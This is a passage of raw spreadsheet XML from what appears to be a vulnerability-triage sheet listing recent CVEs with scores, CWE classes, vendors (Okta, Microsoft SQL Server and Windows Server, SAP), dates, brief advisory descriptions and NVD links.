      <c r="H321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S321"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T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78630</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S322"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T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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23" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78545</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S324"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T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78550</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S325"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T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44766</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67389</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67390</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67393</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67641</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67645</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67648</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
